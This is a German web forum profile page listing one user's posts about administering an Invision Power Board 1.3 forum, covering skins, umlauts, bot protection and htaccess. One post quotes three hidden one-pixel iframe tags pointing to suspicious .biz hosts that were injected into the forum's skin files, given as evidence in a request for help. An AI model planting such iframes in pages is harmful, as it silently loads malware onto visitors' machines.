Jump to content
InvisionCommunity.de - Der Deutsche Invision Community Support

Suikoden

Mitglied
  • Content count

    29
  • Joined

  • Last visited

About Suikoden

  • Rank
    Grünschnabel

Contact Methods

  • Website URL
    http://www.suikoden3.de
  • ICQ
    0

IP.Board Informationen

  • IP.Board Version
    1.3.x
  1. Ich schon wieder mit CMS-Fragen...

    Google -> webtodate -> erster Eintrag. ;)
  2. troyaner...

    Ich hatte dieses Problem auch (siehe mein Thema http://www.ipbsupport.de/board/index.php?showtopic=5619 ) Grund war u.a. ein schlechtes passwort eines Admins. Ich habe die admin.php dann mit einer htaccess-Datei gesichert, wie dort beschrieben. Seither keine Probleme mehr. Ich kann die htaccess-Datei hier auch reinkopieren, wenn dudich nicht zurechtfindest.
  3. IPB hat diesen Schutz schon standardmäßig an Board. Diesen hab ich aber auch erst vor kurzem entdeckt: Im Adminpanel -> System Settings > Security & Privacy Dort "Enable Script/Bot Flood Control" auswählen. Advanced liefert bisher gute Dienste. Dieser Code wird bei der Registrierung angezeigt. Außerdem hilft es beispielsweise ein 'Custom Field' zu erstellen, welches ein Pflichtfeld ist. Dort müssten dann zum beispiel themenbezogene Dinge rein.
  4. Virusverlinkung im Wrapper

    OK danke. Hat funktioniert. Hab es hinbekommen und sollte nun geschützt sein. Edit: Hm, hat leider zu gut funktioniert. Der meint jetzt, das komplette Forum authentifizieren zu müssen. Edit 2: Jetzt klappt alles. :D
  5. Virusverlinkung im Wrapper

    Ne, das ist nicht im Einsatz. Ich versuch mich gerade an den htaccess-Dateien. Irgendwie funktionieren die im Forum angegeben Dinge nicht. Wobei auch jede Seite was anderes schreibt... müssen die Dateien .htaccess, oder ht.access bzw. .htpasswd oder ht.passwd heißen? Ist mir irgendwie nicht klar.
  6. Hi ihr, ich hab seit einigen Tagen bei meinem IPB 1.3 ein unschönes Problem: Die Wrapper Dateien der Skins werden in letzter Zeit mit Dingen wie: <iframe src='http://fdghewrtewrtyrew.biz/adv/150/' width=1 height=1></iframe> <iframe src='http://fdghewrtewrtyrew.biz/adv/new.php?adv=150' width=1 height=1></iframe> <iframe src="http://zfracysnfj.biz/dl/adv669.php" width=1 height=1></iframe> verseucht. Bin gerade dabei, die CHMOD-Einstellungen zu kontrollieren, und habe dabei festgestellt, dass einige auf 777 standen, dies habe ich auch korrigiert. Dann war einige Tage ruhe, nun taucht das wieder auf. Edit: Hab in der Boardsuche nun doch was gefunden, mal sehen ob mir da was hilft.
  7. www.projectlan.de

    Mir gefällt das Design sehr gut. Kein unnötiger Schnickschnack drin. :)
  8. Antwortfenster vergrößern

    Danke, hat funktioniert. ^_^
  9. Antwortfenster vergrößern

    Und wie geht das? Sorry, bin Laie in dem Gebiet. :wacko:
  10. Hi, da in meinem Forum oftmals längere Beiträge geschrieben werden, würde ich gerne das Antwortfenster vergrößern. Gibts da ne Möglichkeit?` Ich benutze 1.3
  11. Hi ihr, ich habe eben erfahren dass ein Unbefugter Zugriff auf das Mod-Board unserer Seite, was nur für Mods/Admin sichtbar und verwaltbar sein sollte. Angeblich soll das so gehen: Kann da wer helfen? :blink:
  12. Umlaute werden nicht angezeigt

    Danke. Genau das war der Grund.
  13. Hi, hab mal wieder 'ne Frage. *g* Und zwar hab ich mein Forum (suikoden3.de) einige neue Skins eingebaut. Leider ist ein Skin (IBFV Purple) nicht fähig, Umlaute darzustellen. Es werden nur kryptische Buchstaben angezeigt. Was kann man da machen? P.S.: Beim Standardskin und in den anderen Skins auchfunktionieren sie.
  14. IPB will PHP-Dateien runterladen

    Erstmal danke für die Antworten. Die PHP-Version ist 4.3.4 und in der 2. Zeile davon steht: allow_url_fopen On On
  15. Hi ihr, einiger der Member und ich haben seit einiger Zeit in unregelmäßigen Abständen das Phänom, dass anstelle von Topics, der Startseite oder ähnlichem die PHP-Dateien viewtopic.php oder ähnliches anzeigt werden anstelle der Foren. Mein Forum ist dieses: http://www.suikoden3.de/forum/index.php Könnt ihr mir da helfen?
×